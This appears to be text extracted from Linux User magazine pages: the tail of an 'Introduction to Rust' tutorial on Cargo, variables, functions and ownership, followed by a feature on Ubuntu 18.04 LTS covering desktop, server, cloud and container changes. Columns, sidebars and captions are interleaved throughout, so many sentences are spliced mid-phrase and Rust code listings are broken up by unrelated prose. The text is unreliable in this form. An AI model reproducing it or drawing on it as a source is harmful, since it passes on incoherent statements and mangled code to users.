If you installed Rust from your package manager, there’s whole it tends to obscure bugs in the code. If we have
a chance that you will have to install Cargo separately. code in which we are multiplying character values
You can check whether Cargo is installed by running the together, it is very likely that we are making a mistake.
following command. If the compiler allows us to do this without complaining,
we could be unaware of that mistake until much later on,
$ cargo --version when it might be a lot more difficult to track down. Rust
is considered ‘safe’ precisely because it stops you doing
Cargo is incredibly useful for keeping track of things that shouldn’t make sense.
dependencies in projects. In order to turn our Rust
project into a Cargo project, we’ll need to go through
a few extra steps. First, let’s go back a directory, using If we have code in
$ cd ... Then use the following command to create
a new directory that will hold our Cargo project. which we are multiplying
$ cargo new hello_cargo --bin character values together,
Created binary (application) 'hello_cargo'
project it’s very likely that we are
$ cd hello_cargo
making a mistake
Look at the contents of this directory with $ ls and
you’ll see that it contains a file called Cargo.toml and a For example, let’s go into the file main.rs inside the src
directory called src. The src directory already contains directory and add the following lines of code into the main
a file, main.rs, that is exactly the same as the hello. function.
rs that we created earlier. In fact, we can run it straight
away from inside the hello_cargo directory using the let letter_a = 'A';
command cargo run. We won’t be using the capabilities let letter_b = 'B';
of Cargo in this tutorial, but it’s a good idea to get into the let product = letter_a * letter_b;
habit of using it so you can take advantage of it later on.
When we try to compile this code using cargo run, Rust
Variables and typing will display a clear error message:
Strong typing is central to the safety features provided
by Rust. In C, it is perfectly legal to write code like this: $ cargo run
www.linuxuser.co.uk 53
Tutorial Introduction to Rust
54
When we try to compile this code using cargo run, Figure 5
Rust gets angry and presents us with the error message Control-flow
cannot assign twice to immutable variable. What fn solve_quadratic_equation(a: f64, statements
this illustrates is that variables in Rust are immutable b: f64, c: f64) -> (f64, f64) { While we haven’t
by default – that is, they hold one particular value and let d = (b * b) - (4.0 * a * c); mentioned them
cannot be assigned to more than once. let first_solution = (-b + d.sqrt()) much here, Rust
The reason for this is that immutable variables are / (2.0 * a); has plenty of
much safer in general than mutable ones, especially in let second_solution = (-b - control-flow
complex multithreaded systems, where changes in the d.sqrt()) / (2.0 * a); statements;
values of variables makes behaviour of the system much (first_solution, second_solution) the looping
harder to reason about. We recommend that you stick to } constructs are
immutable variables as far as possible. illustrated in
Nevertheless, sometimes mutable variables are useful. Figures 2 and
fn main() {
An example is the while loop in Figure 2. To tell Rust that 3. The simplest
a variable should be mutable, we use the mut keyword.
let (solution_1, solution_2) = looping construct
solve_quadratic_equation(1.0, is loop, which
let mut i = 0; -5.0, 6.0); starts an
i = 1; // Compiles fine. println!("{} {}", solution_1, infinite loop.
solution_2); The while loop
An alternative to using mut is what Rust calls ‘shadowing’. } is slightly more
Shadowing is when we use the same name for two sophisticated,
different variables in the same scope. For example: and loops
You should use shadowing rather than mut if you have round as long
let x = 0; the chance, since it avoids introducing actual mutable as a specified
let x = 1; variables. Shadowing is, however, less powerful than Boolean
mutability: indeed, it is nothing more than a syntactic condition is true.
Here, the second line let x = 1; creates a new variable sugar for immutable variables. The while loop in Figure The for loop can
called x and assigns it the value 1. From this point, 2 doesn’t work with shadowing, because in this case the be used to iterate
whenever we refer to x in the code, we are referring condition i <= 8 refers to the original i, rather than the over collections
to the second variable (unless we shadow again and shadowed value. such as arrays
produce a third variable called x). Functionally, there is no and ranges.
difference between this and calling the second variable Functions
y or something else: we do it in order to avoid having to No systems programming language would be complete
think up new variable names. Since it is impossible to without the ability to write our own functions. We have
refer to the original variable x once we have shadowed already seen one example of a function: the main() Above Left The
it, you should treat shadowing as a more limited form function that runs when the program starts. main() does idiomatic way to return
of mutability: you can imagine that the variable x has not take any input, but we can also write functions that a value from a function
changed value from 0 to 1, as long as you remember that take in values as parameters. For example, we could in Rust is to put the
they are in fact two separate immutable variables. write the little program shown in Figure 4, which prints ‘return value’ as the
out the two solutions to a quadratic equation (assuming last statement in the
Figure 4 that equation has only real solutions). function, without a
One thing that is important to notice is that the semicolon
fn solve_quadratic_equation(a: f64, parameters to a function must always take type
b: f64, c: f64) { signatures. Here, we have required that the numbers Left Rust requires us
let d = (b * b) - (4.0 * a * c); a, b and c be 64-bit floating point types. One reason for to give type signatures
println!("The first solution is {}", this restriction is that the main tool Rust uses to infer for parameters to a
(-b + d.sqrt()) / (2.0 * types of variables is by looking at when they are passed function, so that we
a)); into or out of functions. So, by forcing us to specify types don’t need to give
println!("The second solution is {}", of function parameters, Rust is better able to enable them elsewhere
(-b - d.sqrt()) / (2.0 * us not to include them elsewhere. For example, when
a)); we call solve_quadratic_equation(1.0, -5.0, 6.0);
Rust knows that the number 5.0 should be a 64-bit float
}
precisely because we have included the type signature in
the function.
fn main() { We can also return values from functions. The syntax
solve_quadratic_equation(1.0, -5.0, for this is a bit different from that used in C, and is more
6.0); similar to that of functional languages such as Haskell.
} We use the arrow -> to specify the return value of a
function. For example, in Figure 5 we have a modified
version of the quadratic equation function from Figure 4
www.linuxuser.co.uk 55
Tutorial Introduction to Rust
56
Figure 8 Top Left Returning
Mutable references values from functions
fn borrow_ownership(x: Box<i32>) -> If you use references to pass values to functions can restore ownership
Box<i32> { without transferring ownership, you might notice that back to the calling
println!("{} borrowed!", x);
x
244 words
you can’t modify these values within the functions.
This is a deliberate design decision: since we can have
context
to as soon as that variable goes out of scope. Other The function does not actually do anything much with the
languages can’t do this, because there’s always a chance parameter, but the fact that it takes in the value means
that some other variable is pointing to the same bytes. In that it also takes ownership of the bytes that it points to
Rust, on the other hand, there is a guarantee that such (which have the value 2018). When the function returns,
a situation can never occur, since it is impossible for x goes out of scope and the memory will be freed.
two variables to point to the same data; as soon as we This means that the code as it stands will not compile,
point a new variable to a piece of data, it automatically because the last println! statement refers to current_
invalidates the old pointer. year after it has been invalidated.
This is a bit like C++’s unique_ptr: if we have two We can stop this from happening by returning the value
unique_ptr pointers, we cannot set one to be equal back from the function, as in Figure 8. When we return a
to the other, but must instead use the move function, pointer value, we transfer ownership back to the calling
which invalidates the first pointer. The difference is that context. In this case, we have returned x, which gets put
‘invalidate’ here means that the first pointer is set to into the new (shadowed) variable current_year in the
null, so that attempting to de-reference it later on will main() function.
result in a segmentation fault at runtime. By contrast, This is fine, but it can be a bit annoying if we also want
de-referencing an invalidated pointer in Rust causes a to return separate values from the function. Luckily, Rust
compiler error, helping us to catch bugs much earlier on. provides a way of passing pointer values to functions that
does not transfer ownership.
Passing values For this we use something called a reference, which
Another way that ownership is transferred is by passing is a bit like a ‘borrowed value’: it allows us to look at the
values to functions. If we have a variable that points to contents of the box, but does not transfer ownership.
some bytes on the heap and we pass it into a function, Figure 9 shows a more concise version of the code in
the parameter inside that function takes ownership of Figure 8 using references. In order to signify that a
the variable. Let’s look at an example; for a change, we’ll parameter to a function is a reference, we need to put
use Rust’s Box::new instead of String::from. Box::new an ampersand & in front of the parameter name, and we
allocates some memory, initialising it to a given value, also need an & in front of the name of the variable we are
and returns the ‘boxed value’ – that is, a variable pointing passing in (in this case, current_year).
to that memory. There’s obviously a lot more to Rust than we can cover
The code in Figure 7 includes a function, steal_ in this introduction, but hopefully it has given you a taste
ownership, that takes a boxed integer as a parameter. of what this excellent language can do.
www.linuxuser.co.uk 57
Feature Ubuntu 18.04 LTS
top features
of
ubuntu
18. 4Ubuntu ‘Bionic Beaver’ 18.04 represents the first long term
support release of a new generation of the leading
Linux distribution, with over 30 exciting changes
58
W at a glance
hen major changes happen in a development, as it adjusts the focus of
distribution that’s as widely used its business. A year ago, founder Mark
as the Canonical-supported Shuttleworth announced that the company
Ubuntu, the Linux universe takes notice. would no longer focus on convergence • Desktop p60
Ubuntu’s release schedule is such that as its priority, and would instead look Ubuntu 18.04 ditches the Unity
seismic shifts typically take place outside to invest in areas that provided growing desktop and brings GNOME on X.Org
long term support (LTS) releases, before revenue opportunities – specifically in the to LTS for the first time in a long time.
then being included later in an LTS version. server and VM, cloud infrastructure, cloud
Ubuntu’s regular releases are supported for operations and IoT/Ubuntu Core markets. • Server p62
nine months, but for LTS releases it’s five While this broadening of focus might The Server release of Bionic Beaver
years, which means that a great deal of care at first appear as a cause for concern sports a much-improved installer and
and preparation takes place to ensure that for desktop users, the reality is quite a new, smaller ISO file for a minimal
what goes into a LTS is as stable as different. Ubuntu 17.10 demonstrated install option.
possible. The most recent big change in that a significant change to Ubuntu could
Ubuntu came with 17.10 Artful Aardvark, be delivered without disruption, and the • Cloud p64
which was released in October 2017. This company has also demonstrated a keen The latest Ubuntu release offers
interest in taking on tighter integration with Canonical’s
board user feedback cloud offerings and a simplified
Ubuntu continues to be a to help shape 18.04. deployment process.
A survey distributed
distribution that targets a broad to help choose the • Containers p66
Ubuntu default As well as a new release of LXD,
range of users: basic web or office applications elicited Ubuntu continues to offer support
tens of thousands for Kubernetes and Docker on public,
users, developers, sysadmins, of responses and private, hybrid or bare-metal clouds.
was used to refine
robotics engineers the release. Ubuntu • Core/IoT/Robotics p68
continues to be a Ubuntu is experiencing huge growth in
distribution that the areas of IoT players and robotics,
has provided a short but valuable window targets a broad range of users; basic web making use of Canonical’s investment
for developers to shake down the changes or office users, developers, sysadmins, in the snap ecosystem.
before deciding on exactly what makes the robotics engineers – they are all catered
cut for the LTS version; as you’ll see, not for. Of course, if the default Ubuntu
everything made it in, but 18.04 is isn’t quite to your taste, a wide range of beaver as having an “energetic attitude,
groundbreaking nonetheless. alternative flavours continue to be available industrious nature and engineering
Ubuntu 18.04 ‘Bionic Beaver’ represents a for a variety of use cases, hardware prowess”, which he then likened to Ubuntu
shift not only in technology, but also marks configurations or personal preference. contributors. Meanwhile, the ‘Bionic’ part
a change in perspective for Canonical, Why is this release called ‘Bionic Beaver’? is a hat-tip to the growing number of robots
the company that supports Ubuntu’s Well, Mark Shuttleworth described the running Ubuntu Core. Nice!
www.linuxuser.co.uk 59
Feature Ubuntu 18.04 LTS
Ubuntu Desktop
The new GNOME on Ubuntu era makes its way to LTS
S
hould you be upgrading to Ubuntu
18.04 (named after the fourth
month of 2018) from 17.10, the
latest version will feel like a regular
incremental upgrade, with the major
changes having happened in the last
release. If you’re upgrading from the last
LTS version, you’re in for more of a surprise.
The biggest visual change is the shift from
Unity to GNOME. Bionic ships with GNOME
version 3.28, running the ‘Ambiance’ theme
as always, and is tweaked to provide as
painless a transition as possible for existing
users. This also extends to running Nautilus
3.26 rather than the latest 3.28, as the latest
release removes the ability to put shortcuts
on the desktop. You do get a nice new Bionic
Beaver-themed desktop background of Above Ubuntu now includes GNOME 3.28, with tweaks and customisations designed to improve
course, with support for up to familiarity for migrating Unity users, together with an updated Nautilus look and feel
8K displays! The original
expectation was that kicking off last November, it wasn’t ready will be made available in the future via an
this release would in time for the 18.04 user-interface freeze official snap package. The intention is that
ship with an due to a number of outstanding bugs and the theme will appear as a separate session
all-new theme overall lack of broader testing. That’s on the login screen, making it straightforward
developed by the disappointing for sure, but given the nature to test and be reverted if needed, rather than
community, but of a LTS release, stability is always the having to use the GNOME Tweak Tool. One
unfortunately primary concern. With that said, for those other side-effect of the switch to GNOME is
despite work who want to install the new theme – called that the login screen is now powered by GDM
on the theme Communitheme – the expectation is that it rather than lightdm.
quick guide
Ubuntu flavours
Kubuntu Lubuntu Xubuntu
Kubuntu brings KDE Plasma to Lubuntu is a more lightweight Xubuntu provides another
Ubuntu, providing an alternative version of Ubuntu, running the lightweight alternative, using
high-end desktop environment LXDE desktop environment the Xfce desktop environment
If you’re switching to Ubuntu 18.04 from If you’re running Ubuntu on lower-spec Like Lubuntu, Xubuntu focuses on running
the last LTS release, you’re going to change hardware – perhaps even a Raspberry Pi – well on modest hardware, but has all the
your desktop environment anyway, so what the light but fully featured Lubuntu may be applications pre-installed to get you up
about trying KDE? The Qt-based desktop is worth a look. Unlike the main flavour, 32-bit and running right out of the box. Beautiful
fast, beautiful and quite a different option! images are still available. design also features extensively.
60
In addition to Communitheme, another of the Linux kernel. This version includes To-Do and the upgrading of LibreOffice to
feature that didn’t make the cut for Bionic, Meltdown and Spectre patches as well as version 6. The Linux office suite continues
and in fact has been restored from the secure, encrypted virtualisation and better to go from strength to strength, with
previous release, is the switch from X.Org graphics support for AMD processors, the latest release further developing the
to Wayland as the default display server. a whole host of new drivers, and a huge Notebookbar, adding even better forms
Once again the focus on stability and some number of minor fixes since version 4.13 support, providing enhanced mail merging,
outstanding issues meant that it just wasn’t and particularly since version 4.10 in the including initial OpenPGP support and
felt ready for prime-time. last LTS point release. boasting even better interoperability with
Snaps, the universal Linux packaging other (Microsoft) office suites.
format, is a growing focus with each Ubuntu Other changes For web developers working on Ubuntu,
If you’re installing the new release from it should be noted that ahead of Python
scratch, you may spot several minor 2’s upstream end of life in 2020, it has
One other side- changes. While the Ubiquity installer is still been removed from the main repositories
used, there are some additional options to
effect of the switch be aware of. The first is the ‘minimal’ option
quick tip
which installs Ubuntu without most of the
to GNOME is that the pre-installed software. This saves around Install Communitheme
500MB, but the resulting install itself is not You can try Communitheme yourself.
login screen is now particularly lightweight, particularly when Use sudo add-apt-repository
compared to some alternative flavours. ppa:communitheme/ppa, sudo apt
powered by GDM When partitioning, you will no longer update then sudo apt install
be prompted to create a swap partition. ubuntu-communitheme-session.
This is because file-based swap is now
release and comes to the fore in 18.04 with used. Finally, Ubuntu 18.04 will collect
increased prominence in the Software data about your Ubuntu flavour, location, and Python 3 is now installed by default.
Centre and a standard set installed hardware, location and so on by default, You will need to enable the ‘universe’
including calculator, characters, logs and with the ability to opt-out if desired. The repository to install the older version in
a system monitor. Snaps are designed to data collected by this method will be this release. Users of the GNOME Boxes
bundle all the dependencies an application anonymous, which has mostly alleviated app will be pleased to learn that ‘spice-
needs, therefore reducing common issues privacy concerns from the community. After vdagent’ is now pre-installed, providing
with missing libraries and the need to installation, you’ll notice significant boot- better performance for Spice clients. This
repack an app as multiple versions for speed improvements in the new release. is an open source project to provide remote
several different distributions. Among the raft of software updates, access to virtual machines in a seamless
Ubuntu 18.04 – which is the first LTS there are some that are particularly worthy way, so you can play videos, record audio,
release to come with ISOs for 64-bit of note, such as the addition of colour emoji share USB devices and share folders
machines only – ships with version 4.15 support (via Noto Color Emoji), GNOME without complications.
Ubuntu Budgie uses the simplicity and The Ubuntu MATE project is effectively the Ubuntu Studio focuses on taking the base
elegance of the Budgie interface to produce continuation of the GNOME 2 project. Its desktop image and configuring it to provide
a traditional desktop-orientated distro with tried-and-tested desktop metaphor is easy best performance for creative pros. It also
a modern paradigm. It’s focused on offering to use, and prebuilt images are provided for includes a default software set suited to
a clean and yet powerful desktop. numerous Raspberry Pi devices. audio, graphics, video and publishing use.
www.linuxuser.co.uk 61
Feature Ubuntu 18.04 LTS
quick guide
Install a 32-bit version
Ubuntu Server
can use the netboot image. This
tiny image – available in ISO and
USB stick versions together with
the files needed to carry out a PXE
network boot – includes just enough
Server installs are hugely important to Ubuntu of the distribution to be able to
boot from a network to download
W
hile desktop users may be keen to flow of the desktop setup but is tailored to the rest of the required files. When
update to the ‘latest and greatest’, a server environment. launched, the installer prompts
that doesn’t apply to Ubuntu As well as the underlying updates in the for basic network configuration
Server users. Stability is vital in the server desktop release there are several server- including an optional HTTP proxy,
environment and as such it makes sense to specific improvements in Bionic Beaver. language and keyboard preferences,
stay on LTS versions, upgrading only to LXD, the pure container hypervisor, has mirror selection and user details,
point releases and only then upgrading been updated to version 3.0. This release, before installing the distribution as
systems with caution after a new version. which itself is a LTS version with support normal by downloading the required
The first change for server users comes packages on the fly. Another option
early, with a long-overdue installer update. is to make your own custom ISO;
Ubuntu Server now uses Subiquity (aka The first change for Cubic, available via sudo apt-add-
‘Ubiquity for servers’), which finally brings repository ppa:cubic-wizard/
to servers the live-session support and fast Server users comes release && sudo apt install
installation using Curtin (and boy, is it fast!) cubic provides a GUI for this.
that has long been present on the desktop. with a long-overdue
The installer is still text-based as you’d
expect, but is far more pleasant to use. The installer update enabled, improving network latency and
installer does a great job of replicating the throughput. Libvirt, the virtualisation API,
has been updated to version 4, bringing
until June 2023, adds native clustering the latest improvements to this software
right out of the box, physical-to-container designed for automated management of
migration via lxd-p2c, support for Nvidia virtualisation hosts.
runtime passthrough and a host of other If you deal with cloud images, you’ll be
fixes and improvements. QEMU, the open pleased to hear that cloud-init – a set of
source machine emulator and virtualiser, Python scripts and utilities for working with
is updated to version 2.11.1. Meltdown and said images – gets a bump to the very latest
Spectre mitigations are included in the new 18.2 version, with support for additional
release, although using the mitigations clouds, additional Ubuntu modules, Puppet
requires more than just the QEMU version 4 and speed improvements when working
Above You’ll need to use the -d switch to perform upgrade – the process is detailed in a post with Azure. Ubuntu 18.04 also updates
an upgrade before the first LTS point release on the project’s blog. RDMA support is now DPDK (a set of data plane libraries and
62
network interface controller drivers for
fast packet processing) to the latest stable
release branch, 17.11.x. The intention is that
future stable updates to this branch will be
made available to the Ubuntu LTS release by
a SRU (StableReleaseUpdates) model, which
is new to DPDK.
Open vSwitch, the multilayer virtual
switch designed to enable massive network
automation through programmatic extension,
still supports standard management
interfaces and protocols such as NetFlow,
sFlow, IPFIX, RSPAN, CLI, LACP and 802.1ag.
It has been updated to version 2.9, which
includes support for the latest DPDK and the
latest Linux kernel.
Ntpd, for a long time the staple for NTP
time management, is replaced by Chrony
in Ubuntu 18.04. The change was made
to allow the system clock to synchronise quick guide providing the options to install the main
more quickly and accurately, particularly Using the new Subiquity OS, a MAAS Region Controller or a MAAS
in situations when internet access is brief Rack Controller. Network interfaces
or congested, although some legacy NTP The ncurses-based Subiquity installer can be configured with DHCP or static
modes like broadcast clients or multicast is a huge improvement over previous addresses (both IPv4 and IPv6) and as
server/clients are no longer included. versions of Ubuntu and makes installing on the desktop, automatic (full disk) or
Ntpd is still available from the universe the Server distribution a breeze. It should manual partitioning can be used.
be noted, though, that the feature set At this point, installation starts in
is a little limited for some use cases, the background and progress is shown
Ntpd, for a long with no support yet for LVM, RAID or at the bottom of the screen while user
multipath, although these are expected details are entered (including the ability
time the staple for NTP in a future release. After booting the to import SSH identities). A log summary
ISO, Subiquity prompts for language is displayed on screen and a full log can
time management, is and keyboard settings (with automatic be viewed at completion, before selecting
keyboard identification offered) before the reboot option.
replaced by Chrony
a more consistent experience when dealing with a final reboot required for the changes
repository, but as it is subject to only ‘best with multiple systems via MAAS or when to take effect. Note, however, that the above
endeavours’ security updates, its use is not using cloud provisioning via cloud-init. process will only work LTS when the first
generally recommended. Note that systemd- point release drops (that is, 18.04.1). To
timesyncd is installed by default and Chrony When should I upgrade? update before this time, you effectively need
only needs to be used should you wish to If you’ve read through the release notes for to pass the developer switch: sudo do-
take advantage of its enhanced features. Bionic and you’re happy with what’s included, release-upgrade -d. This is an abundance
Bionic marks the end of the LTS road for the upgrade process itself is straightforward: of caution on Canonical’s part, but it is
ifupdown and /etc/network/interfaces. simply update your existing install and run prudent not to upgrade your fleet of servers
Network devices are now configured using sudo do-release-upgrade. Follow through the minute the ISO is available!
netplan and YAML files stored in the on-screen instructions and the updated A sensible approach when performing
/etc/netplan on all new Ubuntu installs. packages will be downloaded and installed, a major upgrade, whether on a server or
Administrators can use netplan ifupdown- a desktop, is to run as full a test cycle
migrate to perform simple migrations on as possible before making changes on a
existing installs. The change quick tip system that is effectively in a production
to netplan is focused No-reboot required for state. This can be easily achieved using a
on making it more updates with Livepatch tool like Clonezilla (https://clonezilla.org) if
straightforward The Canonical Livepatch service that’s feasible, although there are several
to describe enables critical kernel security fixes to alternative approaches if you need to keep
complex be provided without rebooting. It’s free your system running during the process.
network for a small number of devices and is Note that while it is technically possible to
configs, enhanced in Bionic with dynamic MOTD revert from an upgrade, it’s not a particularly
as well as status updates. straightforward process and is therefore not
providing particularly recommended.
www.linuxuser.co.uk 63
Feature Ubuntu 18.04 LTS
Ubuntu Cloud
The Ubuntu push to the cloud gathers pace, with a broad product offering
C
anonical has already highlighted
the importance of Ubuntu Cloud to
its revised strategy as a rapidly
growing revenue stream. Ubuntu is well on
the way to becoming the standard OS for
cloud computing, with 70 per cent of public
cloud workloads and 54 per cent of
OpenStack clouds using the OS.
Canonical has supported OpenStack on
Ubuntu since early 2011, but what exactly is
it? OpenStack is a “cloud operating system
that controls large pools of compute, storage,
and networking resources throughout
a datacentre, all managed through a
dashboard that gives administrators control
while empowering their users to provision
resources through a web interface”.
Getting started with OpenStack for your
own use is straightforward, thanks to a tool Above The ‘conjure-up’ tool includes several pre-packed ‘spells’ for cloud and container deployments
called conjure-up. This is ideal if you want to
quickly build an OpenStack cloud on a single containers are as fast as the native OS which First install LXD using sudo snap install
machine in minutes; in addition, the same means that in the cloud, lxd followed by lxd init and newgrp lxd.
utility can also deploy to public clouds or to a you get subdivided machines without Next, use sudo snap install conjure-
group of four or more physical servers using reduced performance. up –classic and conjure-up to launch
MAAS (Metal As A Service – cloud-style Conjure-up itself is installed as a snap the tool itself. The text-based utility – it’s
provisioning for physical server hardware, package, as is LXD, which will increasingly built for servers, after all – provides a
particularly targeting big data, private cloud, become the Ubuntu way from 18.04 onwards. list of recommended ‘spells’. Spells are
PAAS and HPC). For local use, conjure-up descriptions of how software should be
can use LXD containers against version 3.0 deployed and are made up of YAML files,
of LXD included in Bionic Beaver. The LXD Snap packages will charms and deployment scripts. The main
hypervisor runs unmodified Linux guest conjure-up spells are stored in a GitHub
operating systems with VM-style operations increasingly become registry at https://github.com/conjure-
at uncompromised speed. LXD containers up/spells; however, spells can be hosted
provide the experience of virtual machines the Ubuntu way from anywhere – a GitHub repo location can be
with the security of a hypervisor, but running passed directly to the tool, from which spells
much, much faster. On bare-metal, LXD 18.04 onwards will be loaded. ‘OpenStack with NovaLXD’
quick guide
Use Juju to deploy a service
Juju ‘charms’ provide the easiest cs:elasticsearch. When the
way to simplify deployment and command completes, ElasticSearch
management of specific services. is up! By default, the application
Found at https://jujucharms. port (9200) is only available from the
com, charms cover many different instance itself, but changing this
scenarios including ops, analytics, is as simple as using the command
Apache, databases, network, juju expose elasticsearch. Use
monitoring, security, OpenStack juju status to confirm which ports
and more. Using the ElasticSearch are open. To open all ports, use the
charm as an example, using it is command juju set elasticsearch
as simple as entering juju deploy firewall_enabled=false.
64
is the best spell to start with – you’ll
note spells are also provided for big data quick guide
analysis using Apache Hadoop and Spark, Try Ubuntu in the cloud for free
as well as for Kubernetes.
After selecting the spell, you’ll be Ubuntu offers exciting opportunities for instance. Google Cloud Platform offers
prompted to choose a setup location deploying to the cloud, but due to the $300 credit valid for 12 months, plus, like
(localhost), configure network and storage, pricing models, costs can rack up quickly! Amazon, a free product tier to get you
then provide a public key to enable you to Thankfully, if you want to try out some started. DigitalOcean offers $100 to get
access the newly deployed instance. Accept cloud deployments without spending started with its services and is a great
the default application configuration and any money, a number of providers have alternative to the bigger players. You may
hit ‘Deploy’. Juju Controller – part of Juju, free offerings available. Amazon’s AWS not expect it, but Microsoft’s Azure also
an open source application and service has the best deal, with a free tier that has useful Linux options with £150 credit
modelling tool – will then deploy your providers a server running 24 hours a day valid for 30 days and, once again, its own
configuration. After setup completes, you’ll for a whole year, plus a host of add-on free low-usage tier. All these services
be able to open the OpenStack Dashboard services. Its ‘Lightsail’ offering also are easy to set up and come with Ubuntu
at http://<openstack ip>/horizon and offers a free one-month trial of the basic Server and container images.
login with the default admin/openstack
username and password to see what has
Foundation Cloud
Build is well suited
to redeploying or
cloning existing cloud
architecture
been created. Use the lxc list command
to validate that the system you’ve conjured
up is running.
Canonical also offers BootStack, which
is an ongoing, fully managed private
OpenStack cloud. This is ideal for on- The charms of Juju and manage Ubuntu servers.
premise deployments and is supplemented While conjure-up uses Juju internally, it can Landscape monitors systems
by a lighter-touch service, Foundation also be used directly to model, configure using a management
Cloud Build for Ubuntu OpenStack, where a and manage services for deployment to all agent installed on each
Canonical team will build a highly available major public and private clouds with only machine, which in turn
production cloud, implemented on-site a few commands. Over 300 preconfigured communicates with
in the shortest possible time. Foundation services are available in the Juju store a centralised server
Cloud Build is well suited to redeploying or (known as ‘charms’), which are effectively to send back health
cloning existing cloud architecture. scripts that simplify the deployment and metrics, update
Should you want to manage your own management tasks of specific services. information and other
deployment to public clouds, certified Of course, Juju is free and open source. data for up to 40,000
images are available for AWS, Azure, Google One further piece of the Ubuntu cloud machines. Landscape is
Cloud Platform, Rackspace and many other puzzle is Canonical’s ‘Cloud Native a paid service starting
such services. Platform’, which is a pure Kubernetes at 1¢ per machine per
play. Cloud Native Platform is provided in hour when used as a SaaS
partnership with Rancher Labs and delivers product; however it can be
quick tip a turnkey application-delivery platform, deployed for on-premise use
Set up Landscape built on Ubuntu, Kubernetes and Rancher, on up to 10 machines for free.
Add the PPA: sudo add-apt- a Kubernetes management suite. Although many of the pieces of
repository ppa:landscape/17.03 and After you’ve deployed to the cloud, the cloud software stack are updated
update your package list (sudo apt a common challenge is exactly how you independently of the main OS, inclusion of
update). Install: sudo apt install manage the servers in your infrastructure. these latest technologies in the LTS release
landscape-server-quickstart. Canonical has a tool to help with this in drives forward the possibilities of what can
the form of ‘Landscape’, to deploy, monitor be achieved using the cloud with Ubuntu.
www.linuxuser.co.uk 65
Feature Ubuntu 18.04 LTS
how to
Deploy Kubernetes on
Ubuntu to a cloud provider
Containers
Containers underpin the Ubuntu cloud
1
Install conjure-up
Conjure-up itself is installed
from a snap package using the
command sudo snap install conjure-
up –classic. After installation, use
conjure-up to launch the tool. If you’re
using a pre-snap release, install snapd
first with sudo apt install snapd.
Above Conjure-up can be used to deploy The Canonical Distribution of Kubernetes either locally
or to a supported cloud provider, including all the major players
T
here’s no doubt that containers are system to system and provides advanced
driving innovation in the cloud as a control and passthrough for hardware
logical progression from VMs. resources, including network and storage.
Canonical’s strategy has changed as Of course, LXD is well integrated with
technology has matured, but essentially it is OpenStack and, as a snap package, is easy
2
Select a Kubernetes spell supporting a wide range of technologies to deploy not just on Ubuntu but other Linux
and choose a cloud rather than backing a specific approach. distributions too. Canonical claims LXD’s
After launching conjure-up and LXD is important to Ubuntu (Canonical containers are 25 per cent faster and offer
selecting the ‘The Canonical Distribution founded and currently leads the project),
of Kubernetes’ as your spell, you’ll be with the latest release of the next-generation
prompted to choose a cloud provider. system container manager included in Stable, maintained
Choose ‘new self-hosted controller’ and Ubuntu 18.04. LXD is particularly popular
accept the listed default apps to begin because it offers a user experience that is releases of Docker
the deployment. similar to that of virtual machines while using
Linux containers instead. At its heart LXD is are published and
a privileged daemon which exposes a REST
API. Clients, such as the command -line tool updated by Docker Inc.
provided with LXD itself, then do everything
through that REST API. This means that as snap packages
whether you’re talking to your local host or
a remote server, everything works the same 10 times the density of traditional VMware
way. LXD is secure by design thanks in part ESX or Linux KVM installs, which could
to unprivileged containers and resource translate to a significant cost saving.
restrictions, is scalable for use on your own
3
Connect to and manage laptop or with thousands of Docker Engine on Ubuntu
your Kubernetes container nodes, is intuitive and Canonical’s container offering wouldn’t
After the deployment image-based, be complete without the two current
completes, kubectl (for management) provides an heavyweights – Docker and Kubernetes.
and kubefed (for federation) tools will easy way to Docker Engine is a lightweight container
be installed on your local machine. Use transfer runtime with a fully featured toolset that
kubectl cluster-info to show the images builds and runs your container. Over 65
cluster status and confirm all is good. from per cent of all Docker-based scale-out
66
operations run on Ubuntu.
Stable, maintained releases
of Docker are published and
updated by Docker Inc as
snap packages on Ubuntu,
enabling direct access to
the official Docker Engine
for all Ubuntu users.
Canonical also ensures
global availability of secure
Ubuntu images on Docker
Hub, plus it provides Level 1
and Level 2 technical support
for Docker Enterprise Edition and is
backed by the Docker Inc. company itself
for Level 3 support. Above If deploying using conjure-up, several cloud providers are supported including AWS (pictured),
If you’re at the point where you’re Azure, CloudSigma, Google, Joyent, Oracle and Rackspace
choosing which container technology to try,
it might not be easy to decide between the Native Platform Kubernetes delivered with
above options. Fundamentally, LXD provides Rancher, Canonical has a pure Kubernetes quick tip
a classic virtual machine-like experience offering, known by the rather catchy name Kubernetes with Juju
with all your usual administrative processes of The Canonical Distribution of Kubernetes. Juju can be used to quickly deploy
running, so it feels just like a normal Ubuntu This is pure Kubernetes, tested across Kubernetes Core (a pure Kubernetes/
system. Docker instances, meanwhile, the widest range of clouds and private etcd cluster with no additional
typically contain only a single process or infrastructure with modern metrics and services) or The Canonical Distribution
application per container. monitoring, developed in partnership with of Kubernetes. Use juju deploy
LXD is often used to make ‘Infrastructure Google to ensure smooth operation between cs:bundle/kubernetes-core-292 or
as a Service’ OS-instance deployments Google’s Container Engine (GKE) service juju deploy cs:bundle/canonical-
much faster, whereas Docker is more often with Ubuntu worker nodes and Canonical’s kubernetes-179 respectively.
used by developers to make ‘Platform Distribution of Kubernetes. The stack is
as a Service’ application instances more platform-neutral for use on everything from
portable. Bear in mind that the options are Azure to bare metal, upgrades are frequent fully managed service. Mostly important,
not mutually exclusive – you can run Docker and security updates are automatically Canonical Kubernetes leads in standards
on LXD with no performance impact. applied, a range of enterprise support compliance against the reference
As with Docker, Kubernetes is well options are available, the system is easily implementation.
supported on Ubuntu. As well as the Cloud extensible, and Canonical even offers a Kubernetes uses the same process we
covered earlier for OpenStack courtesy of
conjure-up, only this time you select ‘The
quick guide config file. Next you need to ensure Canonical Distribution of Kubernetes’ in the
Migrate to containers that eth0 is configured for DHCP. options. It’s worth getting a free account at
Finally, to allow OpenStack to inject the somewhere like AWS or Azure to provide a
Ubuntu 18.04 includes LXD 3.0, which has SSH key you must ensure that cloud- standalone cloud test environment.
a new tool called lxd-p2c. This makes it init and curl are installed. With that Deploying containers can be time- and
possible to import a system’s filesystem done, simply create a raw disk image storage-consuming, but one change in
into a LXD container using the LXD API. (use VBoxManage clonehd -raw if Ubuntu 18.04 helps ease the pain. The
After installation, the resulting binary migrating from VirtualBox) and test Bionic Beaver minimal install images have
can be transferred to any system that your image using the kvm command. You been reduced by over 53 per cent in size
you want to turn into a container. Point then just need to upload your image to compared to 14.04, aided by the removal of
it to a remote LXD server and the entire OpenStack, register the image and you over 100 packages and thousands of files.
